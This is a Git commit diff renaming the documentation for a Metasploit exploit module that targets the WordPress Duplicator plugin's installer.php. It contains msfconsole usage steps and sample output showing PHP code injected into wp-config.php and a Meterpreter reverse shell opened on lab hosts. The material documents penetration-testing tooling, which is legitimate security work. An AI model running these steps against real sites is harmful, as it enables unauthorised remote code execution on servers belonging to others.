adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

renamed module and doc

Browse Source
This commit is contained in:
Shelby Pace
2018-12-11 11:59:19 -06:00
parent 7e953e34b9
commit b82e3469a2
2 changed files with 25 additions and 21 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/php/wordpress_duplicator.md → documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md
+20 -17
View File
@@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/wordpress_duplicator`
2. `use exploit/multi/php/wp_duplicator_code_inject`
3. Set the `RHOST`.
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
@@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
```
msf5 > use exploit/multi/php/wordpress_duplicator
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run
msf5 > use exploit/multi/php/wp_duplicator_code_inject
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
rhosts => 192.168.37.247
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
targeturi => /wordpress/installer.php
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1
[*] Sending stage (38247 bytes) to 192.168.37.247
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
[*] Attempting to recreate wp-config file...
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
[*] Successfully created the wp-config.php file!
meterpreter > sysinfo
Computer : debian
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
meterpreter > sysinfo
Computer : WIN-0FAJA14JLP4
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```